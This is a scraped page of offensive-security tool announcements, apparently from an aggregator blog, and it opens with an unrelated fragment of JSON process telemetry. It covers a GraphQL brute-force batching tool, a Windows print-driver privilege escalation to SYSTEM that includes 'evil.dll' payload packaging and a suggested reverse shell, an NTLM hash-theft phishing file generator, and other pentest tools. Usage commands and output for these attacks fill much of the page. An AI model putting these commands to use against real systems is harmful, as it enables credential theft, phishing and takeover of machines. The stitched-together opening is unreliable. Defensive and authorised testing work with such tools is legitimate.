"md5": "9453BC2A9CC489505320312F4E6EC21E",
"sha1": "7219CB54AC535BA55BC1B202335A6291FDC2D76E",
"ProcessIntegrityLevel": "None",
"isOndisk": true,
"isRunning": true,
"Signed": "Signature valid",
"AuthenticodeHash": "B8AD58EE5C35B3F80C026A318EEA34BABF6609C077CB3D45AEE69BF5C9CF8E11",
"Signatures": [
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:24:20",
"NotAfter": "02.12.2021 22:24:20",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8C15B 4C98AD91E051EE5AF5F524A8729050B2A2",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:3BBD-E338-E9A1, OU=Microsoft America Operations, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "12.11.2020 19:26:02",
"NotAfter": "11.02.2022 19:26:02",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8220CE2AAD2073A9C8CD78752775E29782AABE8",
"Timestamp": "15.06.2021 00:39:50 +02:00"
}
]
},
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:31:47",
"NotAfter": "02. 12.2021 22:31:47",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "C774204049D25D30AF9AC2F116B3C1FB88EE00A4",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:F87A-E374-D7B9, OU=Microsoft Operations Puerto Rico, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "14.01.2021 20:02:23",
"NotAfter": "11.04.2022 21:02:23",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "ED2C601EDD49DD2A934D2AB32DCACC19940161EF",
"Timestamp": "15.06.2021 00:39:53 +02:00"
}
]
}
],
"ParentProcess": {
"EventGuid": null,
"StartTime": "2021-07-11T09:54:28.9558001+02:00",
"QEventID": 100,
"QType": "Process Create",
"Username": "TEST- OS\\TESTUSER",
"Imagefilename": "",
"KernelImagefilename": "",
"OriginalFilename": "TEAMS.EXE",
"Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
"PID": 16232,
"Commandline": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe ",
"Modulecount": 162,
"TTPHash": "",
"Imphash": "F14F00FA1D4C82B933279C1A28957252",
"sha256": "155625190ECAA90E596CB258A07382184DB738F6EDB626FEE4B9652FA4EC1CC2",
"md5": "9453BC2A9CC489505320312F4E6EC21E",
"sha1": "7219CB54AC535BA55BC1B202335A6291FDC2D76E",
"ProcessIntegrityLevel": "Medium",
"isOndisk": true,
"isRunning": true,
"Signed": "Signature valid",
"AuthenticodeHash": "B8AD58EE5C35B3F80C026A318EEA34BABF6609C077CB3D45AEE69BF5C9CF8E11",
"Signatures": [
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=W ashington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:24:20",
"NotAfter": "02.12.2021 22:24:20",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8C15B4C98AD91E051EE5AF5F524A8729050B2A2",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:3BBD-E338-E9A1, OU=Microsoft America Operations, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "12.11.2020 19:26:02",
"NotAfter": "11.02.2022 19:26:02",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8220CE2AAD2073A9C8CD78752775E29782AABE8",
"Timestamp": "15.06.2021 00:39:50 +02:00"
}
]
},
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:31:47",
"NotAfter": "02.12.2021 22:31:47",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "C774204049D25D30AF9AC2F116B3C1FB88EE00A4",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:F87A-E374-D7B9, OU=Microsoft Operations Puerto Rico, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "14.01.2021 20:02:23",
"NotAfter": "11.04.2022 21:02:23",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "ED2C601EDD49DD2A934D2AB32DCACC19940161EF",
"Timestamp": "15.06.2021 00:39:53 +02:00"
}
]
}
],
"ParentProcess": null
}
}


BatchQL - GraphQL Security Auditing Script With A Focus On Performing Batch GraphQL Queries And Mutations

18 September 2021 at 20:30
By: Zion3R


BatchQL is a GraphQL security auditing script with a focus on performing batch GraphQL queries and mutations. This script is not complex, and we welcome improvements.

When exploring the problem space of GraphQL batching attacks, we found that there were a few blog posts on the internet, however no tool to perform GraphQL batching attacks.

GraphQL batching attacks can be quite serious depending on the functionalities implemented. For example, imagine a password reset functionality which expects a 4 digit pin that was sent to your email. With this tool, you could attempt all 10k pin attempts in a single GraphQL query. This may bypass any rate limiting or account lockouts depending on the implementation details of the password reset flow.


Detections

This tool is capable of detecting the following:

  • Introspection query support
  • Schema suggestions detection
  • Potential CSRF detection
  • Query name based batching
  • Query JSON list based batching

Attacks

Currently, this tool only supports sending JSON list based queries for batching attacks. It supports scenarios where the variables are embedded in the query, or where they are provided in the JSON input.


Usage

Enumeration
❯ python batch.py -e http://re.local:5000/graphiql -p localhost:8080

Schema suggestions enabled. Use Clairvoyance to recover schema: https://github.com/nikitastupin/clairvoyance
CSRF GET based successful. Please confirm that this is a valid issue.
CSRF POST based successful. Please confirm that this is a valid issue.
Query name based batching: GraphQL batching is possible... preflight request was successful.
Query JSON list based batching: GraphQL batching is possible... preflight request was successful.
Most provide query, wordlist, and size to perform batching attack.

Batching Attacks
  1. Save a file that contains your GraphQL query i.e. acc-login.txt:
mutation emailLoginRemembered($loginInput: InputRememberedEmailLogin!) {
emailLoginRemembered(loginInput: $loginInput) {
authToken {
accessToken
__typename
}
userSessionResponse {
userToken
userIdentity {
userId
identityType
verified
onboardingStatus
registrationReferralCode
userReferralInfo {
referralCode {
code
valid
__typename
}
__typename
}
__typename
}
__typename
}
__typename
}
}
  1. Run the following command to run a GraphQL batching attack:
❯ python batch.py --query acc-login.txt --wordlist passwords.txt -v '{"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}' --size 100 -e http://re.local:5000/graphiql -p localhost:8080

The above command does the following:

  • Specifies a query from a local file --query acc-login.txt.
  • Specifies a wordlist --wordlist passwords.txt
  • Specifies the variable input with the replacement identifier -v {"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}
  • Specifies the batch size --size 100
  • Specifies the endpoint -e http://re.local:5000/graphiql
  • Specifies a proxy -p localhost:8080

References


Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool

18 September 2021 at 11:30
By: Zion3R


Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the as designed package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.


What exploits are available

Concealed Position offers four exploits - all with equally dumb names:

The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.


But which exploit should I use?!

Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE damage, hopefully, is patched most everywhere.


How does it work?

Concealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:

Step 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver

Stage 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage

Stage 3: Add a local printer (exploitation stage)
client: Add printer

It is important to note that SLASHINGDAMAGE doesn't actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.


Is this a Windows vulnerability?

Arguably, yes. The driver store is a "trusted collection of ... third-party driver packages" that requires administrator access to modify. Using GetPrinterDriver a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.

Microsoft seemed to agree when they issued CVE-2021-34481.

Although... it's arguable that this is simply a feature of the system and not a vulnerability at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.


Which verions of Windows are affected by CVE-2021-34481?

At least Windows 8.1 and above.


How do I use these tools?

Simple! So simple there will be many paragraphs to describe it!


CP Server

First, let's look at cp_server's command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!

CLI options:
-h, --help Display the help message
-e, --exploit arg The exploit to use
-c, --cabs arg (=.\cab_files) The location of the cabinet files

Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE
SLASHINGDAMAGE

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Above you can see the server requires two options:

  1. The exploit to configure the printer for
  2. A path to this repositories cab_files (.\cab_files\ is the default)

For example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!

[+] Creating temporary space...
[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] Pushing into the driver store
[+] Cleaning up tmp space
[+] Installing print driver
[+] Driver installed!
[+] Installing shared printer
[+] Shared printer installed!
[+] Automation Done.
[!] IMPORTANT MANUAL STEPS!
[0] In Advanced Sharing Settings, Turn off password protected sharing.
[1] Ready to go!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

And that's it, you'll see a new printer on your system:

PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer

Name ComputerName Type DriverName PortName Shared Publishe
d
---- ------------ ---- ---------- -------- ------ --------
ACIDDAMAGE Local Lexmark Universal v2 LPT1: True False
CutePDF Writer Local CutePDF Writer v4.0 CPW4: False False
OneNote for Windows 10 Local Microsoft Software Pri... Microsoft.Of... False False
Microsoft XPS Document Writer Local Microsoft XPS Document... PORTPROMPT: False False
Microsoft Print to PDF Local Microsoft Print To PDF PORTPROMPT: False False
Fax Local Microsoft Shared Fax D... SHRFAX: False False


PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Note that there is one manual step that cp_server prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the "Advanced Sharing Settings" -> "Turn off password protected sharing". You'll have to do that yourself!

The process for using SLASHINGDAMAGE is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and then you'll still need to follow a couple of manual steps and reboot.


CP Client

The client is similarly easy to use. Let's look at it's command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

CLI options:
-h, --help Display the help message
-r, --rhost arg The remote evil printer address
-n, --name arg The remote evil printer name
-e, --exploit arg The exploit to use
-l, --local No remote printer. Local attack only.
-d, --dll arg Path to user provided DLL to execute.

Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE

First, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.

cp_client has two modes: remote and local. The remote option is the most interesting because it adds the vulnerable driver to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:

  1. The exploit I want to use
  2. The evil printer IP address
  3. The name of the evil shared printer

Like this!

C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_ | ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

[+] Checking if driver is already installed
[-] Driver is not available.
[+] Call back to evil printer @ \\10.0.0.9\ACIDDAMAGE
[+] Staging driver in driver store
[+] Installing the staged driver
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

That's it! To execute a local only attack, you just need to provide the exploit:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

[+] Checking if driver is already installed
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Why doesn't the client have a SLASHINGDAMAGE option?

SLASHINGDAMAGE doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:

echo β€œevil.dll” β€œ../../evil.dll” > files.txt
makecab /f files.txt
move disk1/1.cab exploit.cab

It's probably important to know that the version of SLASHINGDAMAGE in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.


Pull Requests and Bugs

Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.


Other things

One thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).



Ntlm_Theft - A Tool For Generating Multiple Types Of NTLMv2 Hash Theft Files

17 September 2021 at 20:30
By: Zion3R


A tool for generating multiple types of NTLMv2 hash theft files.

ntlm_theft is an Open Source Python3 Tool that generates 21 different types of hash theft documents. These can be used for phishing when either the target allows smb traffic outside their network, or if you are already inside the internal network.

The benefits of these file types over say macro based documents or exploit documents are that all of these are built using "intended functionality". None were flagged by Windows Defender Antivirus on June 2020, and 17 of the 21 attacks worked on a fully patched Windows 10 host.


ntlm_theft supports the following attack types:

  • Browse to Folder Containing
    • .url – via URL field
    • .url – via ICONFILE field
    • .lnk - via icon_location field
    • .scf – via ICONFILE field (Not Working on Latest Windows)
    • autorun.inf via OPEN field (Not Working on Latest Windows)
    • desktop.ini - via IconResource field (Not Working on Latest Windows)
  • Open Document
    • .xml – via Microsoft Word external stylesheet
    • .xml – via Microsoft Word includepicture field
    • .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)
    • .docx – via Microsoft Word includepicture field
    • .docx – via Microsoft Word external template
    • .docx – via Microsoft Word frameset webSettings
    • .xlsx - via Microsoft Excel external cell
    • .wax - via Windows Media Player playlist (Better, primary open)
    • .asx – via Windows Media Player playlist (Better, primary open)
    • .m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
    • .jnlp – via Java external jar
    • .application – via any Browser (Must be served via a browser downloaded or won’t run)
  • Open Document and Accept Popup
    • .pdf – via Adobe Acrobat Reader
  • Click Link in Chat Program
    • .txt – formatted link to paste into Zoom chat

Usecases (Why you want to run this)

ntlm_theft is primarily aimed at Penetration Testers and Red Teamers, who will use it to perform internal phishing on target company employees, or to mass test antivirus and email gateways. It may also be used for external phishing if outbound SMB access is allowed on the perimeter firewall.

I've found it useful while penetration testing to easily see what file types I have available to me, rather than spending time configuring a specific attack as would be used on red teaming engagements. You could send a .rtf or .docx file to the HR department, and a .xlsx spreadsheet doc to the finance department.


Getting Started

These instructions will show you the requirements for and how to use ntlm_theft.


Prerequisites

ntlm_theft requires Python3 and xlsxwriter:

pip3 install xlsxwriter

Required Parameters

To start up the tool 4 parameters must be provided, an input format, the input file or folder and the basic running mode:

-g, --generate	: Choose to generate all files or a specific filetype
-s, --server : The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc)
-f, --filename : The base filename without extension, can be renamed later (eg: test, Board-Meeting2020, Bonus_Payment_Q4)

Example Runs

Here is an example of what a run looks like generating all files:

# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
Created: test/test.scf (BROWSE)
Created: test/test-(url).url (BROWSE)
Created: test/test-(icon).url (BROWSE)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Generation Complete.

Here is an example of what a run looks like generating only modern files:

# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
Skipping SCF as it does not work on modern Windows
Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
Created: meeting/meeting.rtf (OPEN)
Created: meeting/meeting-(stylesheet).xml (OPEN)
Created: meeting/meeting-(fulldocx).xml (OPEN)
Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: meeting/meeting-(includepicture).docx (OPEN)
Created: meeting/meeting-(remotetemplate).docx (OPEN)
Created: meeting/meeting-(frameset).docx (OPEN)
Created: meeting/meeting-(externalcell).xlsx (OPEN)
Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: meeting/meeting.asx (OPEN)
Created: meeting/meeting.jnlp (OPEN)
Created: meeting/meeting.application (DOWNLOAD AND OPEN)
Created: meeting/meeting.pdf (OPEN AND ALLOW)
Skipping zoom as it does not work on the late st versions
Skipping Autorun.inf as it does not work on modern Windows
Skipping desktop.ini as it does not work on modern Windows
Generation Complete.

Here is an example of what a run looks like generating only a xlsx file:

# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
Generation Complete.

Authors
  • Jacob Wilkin - Research and Development

License

ntlm_theft Created by Jacob Wilkin Copyright (C) 2020 Jacob Wilkin

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.


Acknowledgments


On-The-Fly - Tool Which Gives Capabilities To Perform Pentesting Tests In Several Domains (IoT, ICS & IT)

17 September 2021 at 16:20
By: Zion3R


 β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ   β–ˆβ–ˆβ–ˆβ–„    β–ˆ     β–„β–„β–„β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–“  β–ˆβ–ˆβ–‘ β–ˆβ–ˆ  β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ       β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–“   β–“β–ˆβ–ˆ   β–ˆβ–ˆβ–“
β–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’ β–ˆβ–ˆ β–€β–ˆ β–ˆ β–“ β–ˆβ–ˆβ–’ β–“β–’β–’β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆ β–“β–ˆ β–€ β–“β–ˆβ–ˆ β–“β–ˆβ–ˆβ–’ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–’
β–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–“β–ˆβ–ˆ β–€β–ˆ β–ˆβ–ˆβ–’ β–’ β–“β–ˆβ–ˆβ–‘ β–’β–‘β–‘β–’β–ˆβ–ˆβ–€β–€β–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–‘ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘
β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘β–“β–ˆβ–ˆβ–’ β–β–Œβ–ˆβ–ˆβ–’ β–‘ β–“β–ˆβ–ˆβ–“ β–‘ β–‘β–“β–ˆ β–‘β–ˆβ–ˆ β–’β–“β–ˆ β–„ β–‘β–“β–ˆβ–’ β–’β–ˆβ–ˆβ–‘ β–‘ β–β–ˆβ–ˆβ–“β–‘
β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘β–’β–ˆβ–ˆβ–‘ β–“β–ˆβ–ˆβ–‘ β–’β–ˆβ–ˆβ–’ β–‘ β–‘β–“β–ˆβ–’β–‘β–ˆβ–ˆβ–“β–’β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆ β–’β–‘β–’β–ˆβ–‘ β–’β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–‘ β–ˆβ–ˆβ–’β–“β–‘
β–‘ β–’β–‘β–’β–‘β–’β–‘ β–‘ β–’β–‘ β–’ β–’ β–’ β–‘β–‘ β–’ β–‘β–‘β–’β–‘β–’β–‘β–‘β–‘ β–’β–‘ β–‘ β–’ β–‘ β–‘β–‘ β–’β–‘β–“ β–ˆβ–ˆβ–’β–’β–’
β–‘ β–’ β–’β–‘ β–‘ β–‘β–‘ β–‘ β–’β–‘ β–‘ β–’ β–‘β–’β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–’ β–“β–ˆβ–ˆ β–‘β–’β–‘
β–‘ β–‘ β–‘ β–’ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–’ β–’ β–‘β–‘
β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘

Different technologies and paradigms are hyperconnected and offer advances to society. The usage of other technologies among these devices makes security uneven. When facing a pentest in any environment, one major factor is the network. The network interconnects the world of the Internet of Things, the world of industrial control systems, and information technology. This README introduces the 'on-the-fly' tool, which gives capabilities to perform pentesting tests in several domains (IoT, ICS & IT). It is an innovative tool by bringing together different worlds sharing a common factor: the network.


Prerequisities

'on-the-fly' was written in Python and made extensive use of Scapy and netfilterqueue. It is crucial to have Scapy in Python and netfilterqueue installed with a compatible version of Python. For this, a version of Python 3 up to Python version 3.7.5 is recommended (and no higher, as there may be incompatibilities with 3.8 and 3.9 in some libraries that it uses 'on-the-fly'). There is a requirements.txt file that must be executed the first time the tool is launched using 'pip install -r requirements.txt'. Again the pip version must be oriented to a Python 3 version up to 3.7.5.

pip install -r requirements.txt

Usage
python on-the-fly.py

Example videos

on-the-fly: MySQL_manipulation Module


on-the-fly: SSDP_fake Module


on-the-fly: Proxy_socks4 Module


on-the-fly: Port_forwarding Module


on-the-fly: MDNS_Scan Module


Contact

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.

This software doesn't have a QA Process. This software is a Proof of Concept.

If you have any problems, you can contact:

[email protected]



DNSTake - A Fast Tool To Check Missing Hosted DNS Zones That Can Lead To Subdomain Takeover

16 September 2021 at 20:30
By: Zion3R


A fast tool to check missing hosted DNS zones that can lead to subdomain takeover.


What is a DNS takeover?

